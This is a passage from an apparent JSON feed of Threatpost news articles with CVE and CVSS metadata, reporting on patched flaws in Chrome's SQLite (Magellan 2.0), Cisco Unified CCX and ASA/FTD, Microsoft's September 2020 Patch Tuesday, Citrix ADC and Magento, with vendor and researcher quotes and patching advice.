Magellan 2.0 and will not disclose any details now. Feel free to contact us if you had any technical questions! <https://t.co/3hUro9URWf>\n> \n> \u2014 Tencent Blade Team (@tencent_blade) [December 24, 2019](<https://twitter.com/tencent_blade/status/1209291425369579521?ref_src=twsrc%5Etfw>)\n\nResearchers said that they have not yet seen Magellan 2.0 exploited in the wild.\n\nMagellan 2.0 builds on previously-disclosed [Magellan](<https://threatpost.com/def-con-2019-hacking-google-home/147170/>) flaws, a set of three heap buffer overflow and heap data disclosure vulnerabilities in SQLite (CVE-2018-20346, CVE-2018-20505 CVE-2018-20506). These flaws, [discovered in 2018](<https://blade.tencent.com/magellan/index_en.html>), impact a large number of browsers, IoT devices and smartphones that use the open source Chromium engine.\n", "cvss3": {}, "published": "2019-12-27T16:45:20", "type": "threatpost", "title": "Google Chrome Affected By Magellan 2.0 Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-20346", "CVE-2018-20505", "CVE-2018-20506", "CVE-2019-13734", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-13752", "CVE-2019-13753", "CVE-2020-5135"], "modified": "2019-12-27T16:45:20", "id": "THREATPOST:B5964CC2880F7E4AFF1E9C5DEEE5B287", "href": "https://threatpost.com/google-chrome-affected-by-magellan-2-0-flaws/151446/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:19:28", "description": "Cisco has hurried out a fix out for a critical remote code-execution flaw in its customer interaction management solution, Cisco Unified Contact Center Express (CCX).\n\nCisco\u2019s Unified CCX software is touted as a \u201ccontact center in a box\u201d that allows companies to deploy customer-care applications. The flaw (CVE-2020-3280), which has a CVSS score of 9.8 out of 10, stems from the Java Remote Management Interface of the product.\n\n\u201cThe vulnerability is due to insecure deserialization of user-supplied content by the affected software,\u201d according to Cisco, in a [Wednesday security alert](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-uccx-rce-GMSC6RKN>). \u201cAn attacker could exploit this vulnerability by sending a malicious serialized Java object to a specific listener on an affected system. A successful exploit could allow the attacker to execute arbitrary code as the root user on an affected device.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAn unauthenticated, remote attacker could exploit this flaw to execute arbitrary code on an affected device. Those who are using Cisco Unified CCX version 12.0 and earlier are urged to update to the fixed release, 12.0(1)ES03. Version 12.5 is not vulnerable, according to Cisco.\n\nCisco is not aware of any public announcements or malicious use of the flaw, according to the update. The tech giant on Wednesday also released a patch addressing [a high-severity flaw](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cpnr-dhcp-dos-BkEZfhLP>) (CVE-2020-3272) in its Prime Network Registrar, which enables dynamic host configuration protocol (DHCP) services (as well as DNS services).\n\nThe flaw stems from insufficient input validation of incoming DHCP traffic. It exists in the DHCP server and could enable an unauthenticated, remote attacker to trigger a denial of service (DoS) attack on an affected device.\n\n\u201cAn attacker could exploit this vulnerability by sending a crafted DHCP request to an affected device,\u201d according to Cisco. \u201cA successful exploit could allow the attacker to cause a restart of the DHCP server process, causing a DoS condition.\u201d\n\nAlso fixed were several medium-severity flaws, including a SQL injection flaw in Cisco\u2019s Prime Collaboration Provisioning Software (CVE-2020-3184), a DOS flaw in Cisco AMP for Endpoints Mac Connector Software (CVE-2020-3314) and memory buffer flaws (CVE-2020-3343, CVE-2020-3344) in Cisco AMP for Endpoints Linux Connector Software and Cisco AMP for Endpoints Mac Connector Software.\n\nEarlier this month, Cisco also stomped out [12 high-severity vulnerabilities](<https://threatpost.com/cisco-fixes-high-severity-flaws-in-firepower-security-software-asa/155568/>) affecting Cisco\u2019s Firepower Threat Defense (FTD) software, which is part of its suite of network security and traffic management products; and its Adaptive Security Appliance (ASA) software, the operating system for its family of ASA corporate network-security devices. The flaws can be exploited by unauthenticated remote attackers to launch an array of attacks \u2013 from denial of service (DoS) to sniffing out sensitive data.\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On [June 3 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>), join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, [Taming the Unmanaged and IoT Device Tsunami](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>). Get exclusive insights on how to manage this new and growing attack surface. [Please register here](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>) for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-05-21T15:44:30", "type": "threatpost", "title": "Critical Cisco Bug in Unified CCX Allows Remote Code Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3184", "CVE-2020-3272", "CVE-2020-3280", "CVE-2020-3314", "CVE-2020-3343", "CVE-2020-3344", "CVE-2020-5135"], "modified": "2020-05-21T15:44:30", "id": "THREATPOST:73F48A70A1B3DDD9B987BA26009E6630", "href": "https://threatpost.com/critical-cisco-rce-flaw-unified-ccx/155980/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:20:11", "description": "Microsoft has released patches for 129 security bugs in its September Patch Tuesday update. These include 23 critical flaws, 105 that are important in severity and one moderate bug. Fortunately, none are publicly known or under active exploitation, Microsoft said.\n\nThe most severe issue in the bunch is [CVE-2020-16875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875>), according to researchers. This is a memory-corruption problem in Microsoft Exchange that allows remote code-execution (RCE) just by sending an email to a target. Running arbitrary code could grant attackers the access they need to create new accounts, access, modify or remove data, and install programs.\n\n[](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)\n\nClick to Register\n\n\u201cThis patch corrects a vulnerability that allows an attacker to execute code at SYSTEM by sending a specially crafted email to an affected Exchange Server,\u201d wrote Dustin Childs, researcher at Trend Micro\u2019s Zero-Day Initiative (ZDI), in [an analysis](<https://www.zerodayinitiative.com/blog/2020/9/8/the-september-2020-security-update-review>) on Tuesday. \u201cThat is about the worst-case scenario for Exchange servers. We have seen the previously patched Exchange bug CVE-2020-0688 used in the wild, and that requires authentication. We\u2019ll likely see this one in the wild soon. This should be your top priority.\u201d\n\nJustin Knapp, product marketing manager at Automox, added that while this vulnerability only affects Exchange Server versions 2016 and 2019, \u201cthe broad use of Microsoft Exchange across business users and a high CVSS score of 9.1 indicates that this patch should be prioritized high on the list.\u201d\n\nAnother critical RCE vulnerability that should be prioritized for patching is [CVE-2020-1210](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1210>), which exists in SharePoint due to a failure to check an application package\u2019s source markup. It rates 9.9 out of 10 on the CVSS severity scale.\n\n\u201cTo exploit this flaw, an attacker would need to be able to upload a SharePoint application package to a vulnerable SharePoint site,\u201d Satnam Narang, staff research engineer at Tenable, said via email. \u201cThis vulnerability is reminiscent of a similar SharePoint remote code-execution flaw, [CVE-2019-0604](<https://threatpost.com/un-hack-microsoft-sharepoint-flaw/152378/#:~:text=Hackers%20breached%20the%20United%20Nations,SharePoint%20vulnerability%2C%20according%20to%20reports.&text=This%20remote%20code%2Dexecution%20vulnerability,did%20not%20update%20its%20systems.>), that has been exploited in the wild by threat actors since at least April 2019.\u201d\n\nThere are a total of seven RCE bugs being fixed in SharePoint. Only one, CVE-2020-1460, requires authentication.\n\nKnapp flagged another critical RCE vulnerability (rated 8.4 on the CvSS scale) in the Windows Graphic Device Interface ([CVE-2020-1285](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1285>)). It arises because of the way the GDI handles objects in memory, providing both web-based and file-sharing attack scenarios that could introduce multiple vectors for an attacker to gain control of a system, he said.\n\n\u201cIn the web-based attack scenario, an attacker would need to craft a website designed to exploit the vulnerability and then convince users to view the website,\u201d Knapp noted. \u201cSince there\u2019s no way to force users to view the attacker-controlled content, the attacker would need to convince users to take action, typically by getting them to open an email attachment or click a link. In the file-sharing scenario, the attacker would need to convince users to open a specially crafted file designed to exploit the vulnerability. Given the extensive list of Windows and Windows Server versions impacted and the lack of a workaround or mitigation, this is a vulnerability that should be patched immediately.\u201d\n\nSeptember\u2019s slew of patches also features several other RCE bugs, including one in the Microsoft Windows Codecs Library ([CVE-2020-1129](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1129>), with an 8.8 CvSS rating), which is used by multiple applications and can therefore affect a wide range of programs. An attacker could execute code on a victim machine by convincing someone to view a weaponized video clip.\n\n\u201c[This] could allow code execution if an affected system views a specially crafted image,\u201d Childs explained. \u201cThe specific flaw exists within the parsing of HEVC streams. A crafted HEVC stream in a video file can trigger an overflow of a fixed-length stack-based buffer.\u201d\n\nAnother critical RCE problem exists in the Microsoft Component Object Model (COM) for Windows ([CVE-2020-0922](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0922>)), which is a platform-independent system for creating binary software components that can interact with each other. Like the previous bug, there are likely multiple applications that could be impacted by the flaw if they use COM. It rates 8.8 on the CvSS scale.\n\n\u201cThis patch corrects a vulnerability that would allow an attacker to execute code on an affected system if they can convince a user to open a specially crafted file or lure the target to a website hosting malicious JavaScript,\u201d Childs explained.\n\nMeanwhile, [CVE-2020-16874](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16874>) is a critical RCE vulnerability within Visual Studio, rating 7.8. An attacker could successfully exploit this vulnerability by convincing a user to open a specially crafted file using an affected version of the software.\n\n\u201cIf the compromised user is logged in with admin rights, the attacker could take control of the affected system and gain the ability to install programs; view, change, or delete data; or create new accounts with full user rights,\u201d Automox\u2019 Knapp said. \u201cThe vulnerability exists in multiple versions of Visual Studio dating back to 2012.\u201d\n\nAmong the other bugs of note, Childs also highlighted [CVE-2020-0951](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0951>), an important-rated security feature bypass bug in Windows Defender.\n\n\u201cAn attacker with administrative privileges on a local machine could connect to a PowerShell session and send commands to execute arbitrary code,\u201d Childs said. \u201cThis behavior should be blocked by WDAC, which does make this an interesting bypass. However, what\u2019s really interesting is that this is getting patched at all. Vulnerabilities that require administrative access to exploit typically do not get patches. I\u2019m curious about what makes this one different.\u201d\n\nSeptember\u2019s Patch Tuesday release continues a trend of high-volume security updates. The patches are for a wide range of products, including Microsoft Windows, Edge (both EdgeHTML-based and Chromium-based), ChakraCore, Internet Explorer (IE), SQL Server, Office and Office Services and Web Apps, Microsoft Dynamics, Visual Studio, Exchange Server, ASP.NET, OneDrive and Azure DevOps.\n\n\u201cThat brings us to seven straight months of 110+ CVEs,\u201d said Childs. \u201cIt also brings the yearly total close to 1,000. It certainly seems like this volume is the new normal for Microsoft patches.\u201d\n\nOrganizations are struggling to keep up, Knapp noted.\n\n\u201cAs many organizations continue to struggle to support the ongoing distribution of remote workers, Microsoft continues to pile on the updates,\u201d he said. \u201cFinding an efficient method for rolling out these patches has become even more imperative as companies begin to abandon the idea of a short-term fix and shift operations to embrace remote work as part of a lasting, long-term progression of how organizations operate moving forward\u2026.We\u2019re beginning to realize the negative outcomes of the lenient security measures put in place to quickly adapt to a decentralized workforce and it\u2019s become more important than ever to establish patching policies that can securely support remote endpoints for the foreseeable future.\u201d\n\nMeanwhile, [Adobe fixed](<https://threatpost.com/critical-adobe-flaws-attackers-javascript-browsers/159026/>) five critical cross-site scripting (XSS) flaws in Experience Manager as part of its regularly scheduled patches on Tuesday. It also addressed flaws in Adobe Framemaker, its document-processor designed for writing and editing large or complex documents; and InDesign, its desktop publishing and typesetting software application.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. **[**Register today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n", "cvss3": {}, "published": "2020-09-08T20:40:46", "type": "threatpost", "title": "Microsoft's Patch Tuesday Packed with Critical RCE Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0604", "CVE-2020-0688", "CVE-2020-0922", "CVE-2020-0951", "CVE-2020-1129", "CVE-2020-1210", "CVE-2020-1285", "CVE-2020-1460", "CVE-2020-16874", "CVE-2020-16875", "CVE-2020-5135"], "modified": "2020-09-08T20:40:46", "id": "THREATPOST:A298611BE0D737083D0CFFE084BEC006", "href": "https://threatpost.com/microsofts-patch-tuesday-critical-rce-bugs/159044/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:22:57", "description": "Multiple vulnerabilities in the Citrix Application Delivery Controller (ADC) and Gateway would allow code injection, information disclosure and denial of service, the networking vendor announced Tuesday. Four of the bugs are exploitable by an unauthenticated, remote attacker.\n\nThe Citrix products (formerly known as NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively, and are installed in at least 80,000 companies in 158 countries, according to a December assessment from Positive Technologies.\n\nOther flaws announced Tuesday also affect Citrix SD-WAN WANOP appliances, models 4000-WO, 4100-WO, 5000-WO and 5100-WO.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAttacks on the management interface of the products could result in system compromise by an unauthenticated user on the management network; or system compromise through cross-site scripting (XSS). Attackers could also create a download link for the device which, if downloaded and then executed by an unauthenticated user on the management network, could result in the compromise of a local computer.\n\n\u201cCustomers who have configured their systems in accordance with [Citrix recommendations](<https://docs.citrix.com/en-us/citrix-adc/citrix-adc-secure-deployment/secure-deployment-guide.html>) [i.e., to have this interface separated from the network and protected by a firewall] have significantly reduced their risk from attacks to the management interface,\u201d according to the vendor.\n\nThreat actors could also mount attacks on Virtual IPs (VIPs). VIPs, among other things, are used to provide users with a unique IP address for communicating with network resources for applications that do not allow multiple connections or users from the same IP address.\n\nThe VIP attacks include denial of service against either the Gateway or Authentication virtual servers by an unauthenticated user; or remote port scanning of the internal network by an authenticated Citrix Gateway user.\n\n\u201cAttackers can only discern whether a TLS connection is possible with the port and cannot communicate further with the end devices,\u201d according to the critical [Citrix advisory](<https://support.citrix.com/article/CTX276688>). \u201cCustomers who have not enabled either the Gateway or Authentication virtual servers are not at risk from attacks that are applicable to those servers. Other virtual servers e.g. load balancing and content switching virtual servers are not affected by these issues.\u201d\n\nA final vulnerability has been found in Citrix Gateway Plug-in for Linux that would allow a local logged-on user of a Linux system with that plug-in installed to elevate their privileges to an administrator account on that computer, the company said.\n\nOf the 11 vulnerabilities, there are six possible attacks routes; but five of those have barriers to exploitation. Also, the latest patches fully resolve all the issues. Here\u2019s a full list of the bugs with exploitation barriers listed:\n\n\n\nSince Citrix is mainly used for giving remote access to applications in companies\u2019 internal networks, a compromise could easily be used as a foothold to move laterally across a victim organization. However, Citrix CISO Fermin Serna said in an accompanying [blog post](<https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/>) that the company isn\u2019t aware of any active exploitation of the issues so far, and he stressed that the barriers to exploitation of these flaws are significant.\n\n\u201cThere are barriers to many of these attacks; in particular, for customers where there is no untrustworthy traffic on the management network, the remaining risk reduces to a denial-of-service attack,\u201d he wrote. \u201cAnd in that case, only when Gateway or authentication virtual servers are being used. Other virtual servers, for example, load balancing and content switching virtual servers, are not affected by the issue.\u201d\n\nHe added, \u201cthree possible attacks additionally require some form of existing access. That effectively means an external malicious actor would first need to gain unauthorized access to a vulnerable device to be able to conduct an attack.\u201d\n\nSerna also noted that the bugs aren\u2019t related to the CVE-2019-19781 critical bug in Citrix ADC and Gateway, [announced in December](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>). That zero-day flaw [remained unpatched](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) for almost a month and in-the-wild attacks [followed](<https://threatpost.com/chinese-hackers-exploit-cisco-citrix-espionage/154133/>).\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a _**[**_FREE webinar_**](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>)**_, \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>)**_ for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-07-07T14:44:30", "type": "threatpost", "title": "Citrix Bugs Allow Unauthenticated Code Injection, Data Theft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2020-5135", "CVE-2020-8187", "CVE-2020-8190", "CVE-2020-8191", "CVE-2020-8193", "CVE-2020-8194", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8197", "CVE-2020-8198", "CVE-2020-8199"], "modified": "2020-07-07T14:44:30", "id": "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "href": "https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:16:03", "description": "Critical flaws in Adobe\u2019s Magento e-commerce platform \u2013 which is commonly targeted by attackers like the [Magecart cybergang](<https://threatpost.com/magecart-blue-bear-attack/151585/>) \u2013 could enable arbitrary code execution on affected systems.\n\nMagento is a popular, Adobe-owned open-source e-commerce platform that powers many online shops. Adobe on Tuesday released security updates for flaws affecting Magento Commerce 2 and Magento Open Source 2, versions 2.3.5-p1 and earlier. These included two critical vulnerabilities and two important-severity flaws.\n\n\u201cSuccessful exploitation could lead to arbitrary code execution and signature verification bypass,\u201d according to Adobe.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe critical flaws include a path traversal flaw (CVE-2020-9689) that could enable arbitrary code execution. Path traversal attacks essentially allow attackers to trick a web application into reading the files and directories that are stored outside the web root folder. Another critical vulnerability (CVE-2020-9692) is a security mitigation bypass, which could also allow arbitrary code execution. For both of these flaws, an attacker needs administrative privileges to exploit the vulnerability.\n\nAdobe also patched an important-severity observable timing discrepancy, which could enable signature verification bypass (CVE-2020-9690). [According to Mitre](<https://cwe.mitre.org/data/definitions/208.html>), an observable timing discrepancy is when two separate operations require different amounts of time to complete \u2013 in a way that is observable to an attacker \u2013 which reveals security-relevant information about the vulnerable product.\n\nFinally, an important-severity, DOM-based cross-site scripting issue could allow arbitrary code execution. An attacker would not need to be authenticated to abuse this flaw \u2013 meaning that it is exploitable without credentials.\n\nUsers are urged to update to Magento Commerce 2 versions 2.4.0 or 2.3.5-p2, and Magento Open Source 2 versions 2.4.0 or 2.3.5-p2. The update for all vulnerabilities is a priority 2, meaning they exist in a product that has historically been at elevated risk \u2013 but for which there are currently no known exploits.\n\n\u201cBased on previous experience, we do not anticipate exploits are imminent. As a best practice, Adobe recommends administrators install the update soon (for example, within 30 days),\u201d said Adobe.\n\nMagento has had its share of security flaws over the past year. In April Adobe [patched several critical flaws](<https://helpx.adobe.com/security/products/magento/apsb20-22.html>) in Magento, which if exploited could lead to arbitrary code execution or information disclosure. The most serious of these include critical command infection flaws (CVE-2020-9576, CVE-2020-9578, CVE-2020-9582, CVE-2020-9583) and critical security mitigation bypass vulnerabilities (CVE-2020-9579, CVE-2020-9580). Adobe also issued patches in January as part of its overall release of the [Magento 2.3.4 upgrade](<https://magento.com/blog/magento-news/magento-2.3.4-building-more-engaging-customer-experiences>), giving the fixes a \u201cpriority 2\u201d rating.\n\nThe issue also comes after Magento 1 reached end-of-life (EOL) in June, with Adobe making a last-ditch effort to urge the 100,000 online stores still running the outdated version to migrate to Magento 2. E-commerce merchants must [migrate to Magento 2](<https://magento.com/blog/magento-news/support-magento-1-software-ends-june-30-2020>), which was released five years ago.\n\n**_Complimentary Threatpost Webinar__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c__[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)__\u201d brings top cloud-security experts together to explore how __Confidential Computing__ is a game changer for securing dynamic cloud data and preventing IP exposure. Join us __[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) __for this__ FREE __live webinar._**\n\nWrite a comment\n\n**Share this article:**\n\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "cvss3": {}, "published": "2020-07-29T21:22:00", "type": "threatpost", "title": "Critical Magento Flaws Allow Code Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135", "CVE-2020-9576", "CVE-2020-9578", "CVE-2020-9579", "CVE-2020-9580", "CVE-2020-9582", "CVE-2020-9583", "CVE-2020-9689", "CVE-2020-9690", "CVE-2020-9692"], "modified": "2020-07-29T21:22:00", "id": "THREATPOST:F1B41E6C07BCAD79CFBB003B91DF332F", "href": "https://threatpost.com/critical-magento-flaws-code-execution/157840/", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:25:30", "description": "Cisco has stomped out 12 high-severity vulnerabilities across several network security products. The flaws can be exploited by unauthenticated remote attackers to launch an array of attacks \u2013 from denial of service (DoS) to sniffing out sensitive data.\n\nSpecifically affected is Cisco\u2019s Firepower Threat Defense (FTD) software, which is part of its suite of network security and traffic management products; and its Adaptive Security Appliance (ASA) software, the operating system for its family of ASA corporate network security devices.\n\n\u201cAll of the vulnerabilities have a Security Impact Rating of High,\u201d said Cisco [in a Wednesday advisory](<https://tools.cisco.com/security/center/viewErp.x?alertId=ERP-73830>). \u201cSuccessful exploitation of the vulnerabilities could allow an attacker to cause a memory leak, disclose information, view and delete sensitive information, bypass authentication, or create a DoS condition on an affected device.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe most severe flaw exists in the web service interfaces for ASA software and FTD software. This glitch ([CVE-2020-3187](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43>)) could allow an unauthenticated, remote attacker to conduct directory traversal attacks. A directory traversal attack is when insufficient security validation or sanitization of user-supplied input file names is exploited.\n\nThe flaw, which ranks 9.1 out of 10.0 on the CVSS scale, stems from a lack of proper input validation of the HTTP URL in the web interface. An attacker could exploit the flaw by sending a specially crafted HTTP request that contains directory traversal character sequences.\n\n\u201cAn exploit could allow the attacker to view or delete arbitrary files on the targeted system,\u201d explained Cisco. \u201cWhen the device is reloaded after exploitation of this vulnerability, any files that were deleted are restored.\u201d\n\nResearchers with Positive Technologies, who reported the flaw, said that by exploiting the vulnerability in WebVPN, an unauthorized external attacker can also perform DoS attacks on Cisco ASA devices after deleting files from the system.\n\n\u201cVPN blocking may disrupt numerous business processes,\u201d said Mikhail Klyuchnikov with Positive Technologies in an email. \u201cFor example, this can affect connections between branch offices in a distributed network, disrupt email, ERP, and other critical systems. Another problem is that internal resources may become unavailable to remote workers. This is especially dangerous now that many [employees are working remotely](<https://threatpost.com/working-from-home-covid-19s-constellation-of-security-challenges/153720/>) due to the coronavirus outbreak.\u201d\n\nOne caveat is that an attacker who exploits this flaw can only view and delete files within the web services file system (as opposed to ASA or FTD system files or underlying operating system (OS) files). This file system is enabled when the affected device is configured with either WebVPN or AnyConnect features, according to Cisco.\n\n## **Cisco ASA Software Flaws**\n\nCisco fixed seven other high-severity flaws in its ASA and FTD software, including one in the Kerberos authentication feature of ASA. Kerberos is a common authentication protocol for on-premise authentication, used in many ASA interfaces.\n\nThat flaw ([CVE-2020-3125](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-asa-kerberos-bypass-96Gghe2sS>)) could enable an unauthenticated, remote attacker to impersonate the Kerberos key distribution center (KDC) due to insufficient identity verification of the KDC. Attackers could then bypass authentication on an affected device that is configured to perform Kerberos authentication for VPN or local device access.\n\n\u201cCisco uses the Kerberos authentication protocol in many ASA interfaces \u2013 for example, VPN, opening firewall sessions, and administrative access, either through the web management console or through SSH,\u201d said Silverfort researchers [who found the flaw](<https://www.silverfort.com/blog/cisco-vulnerability-cve-2020-3125/>). \u201cTherefore, bypassing Kerberos authentication allows an attacker to take over the Cisco appliance, bypass its security, and gain access to other networks.\u201d\n\nOther flaws in ASA and FTD include denial of service flaws ([CVE-2020-3298](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ftd-ospf-dos-RhMQY8qx>), [CVE-2020-3191](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ipv6-67pA658k>), [CVE-2020-3254](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-mgcp-SUqB8VKH>)and [CVE-2020-3196](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssl-vpn-dos-qY7BHpjN>)), a memory leak vulnerability ([CVE-2020-3195](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ftd-ospf-memleak-DHpsgfnv>)) and information disclosure glitch ([CVE-2020-3259](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-info-disclose-9eJtycMB>)).\n\n## **Firepower Software Flaws**\n\nCisco also patched four flaws that existed only in its FTD software, including a flaw ([CVE-2020-3189](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-dos-Rdpe34sd8>)) in the VPN System Logging functionality of the software. The vulnerability stems from system memory not being properly freed for a VPN System Logging event generated when a VPN session is created or deleted, according to the advisory.\n\nA remote, unauthenticated attacker could exploit this flaw by repeatedly creating or deleting a VPN tunnel connection, which leaks a small amount of system memory for each logging event \u2013 eventually causing system memory depletion and leading to a systemwide DoS condition. The one caveat is that attackers have no control of whether VPN System Logging is configured or not on the device (but it is enabled by default).\n\nOther FTD software flaws include DoS flaws ([CVE-2020-3255)](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-dos-N2vQZASR>) in the packet processing functionality and in the generic routing encapsulation (GRE) tunnel ([CVE-2020-3179](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-dos-2-sS2h7aWe>)), and a DoS flaw ([CVE-2020-3283](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-tls-dos-4v5nmWtZ>)) in the Secure Sockets Layer (SSL) or Transport Layer Security (TLS) handler of FTD software when running on Cisco Firepower 1000 Series appliances.\n\nOverall, Cisco issued 34 patches on Wednesday including 12 high severity flaws and 22 medium severity glitches. This most recent wave of patches come a few weeks after Cisco [warned of a critical flaw](<https://threatpost.com/critical-cisco-ip-phone-rce-flaw/154864/>) in the web server of its IP phones, which if exploited could allow an unauthenticated, remote attacker to execute code with root privileges or launch a DoS attack.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. _**[**_On May 13 at 2 p.m. ET_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_, join Valimail security experts and Threatpost for a FREE webinar, _**[**_5 Proven Strategies to Prevent Email Compromise_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_. Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please _**[**_register here _**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-05-07T18:43:04", "type": "threatpost", "title": "Cisco Fixes High-Severity Flaws In Firepower Security Software, ASA", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3125", "CVE-2020-3179", "CVE-2020-3187", "CVE-2020-3189", "CVE-2020-3191", "CVE-2020-3195", "CVE-2020-3196", "CVE-2020-3254", "CVE-2020-3255", "CVE-2020-3259", "CVE-2020-3283", "CVE-2020-3298", "CVE-2020-5135"], "modified": "2020-05-07T18:43:04", "id": "THREATPOST:EFC1ED7D43C4F52F844E131EAE00990F", "href": "https://threatpost.com/cisco-fixes-high-severity-flaws-in-firepower-security-software-asa/155568/", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-10-15T22:21:15", "description": "Cisco is warning of a critical flaw in the web server of its IP phones. If exploited, the flaw could allow an unauthenticated, remote attacker to execute code with root privileges or launch a denial-of-service (DoS) attack.\n\nProof-of-concept (PoC) exploit code has been posted [on GitHub](<https://github.com/tenable/poc/blob/master/cisco/ip_phone/cve_2020_3161.txt>) for the vulnerability ([CVE-2020-3161](<https://nvd.nist.gov/vuln/detail/CVE-2020-3161>)), which ranks 9.8 out of 10 on the CVSS scale. Cisco issued patches in a [Wednesday advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs>) for the flaw, which affects various versions of its Cisco IP phones for small- to 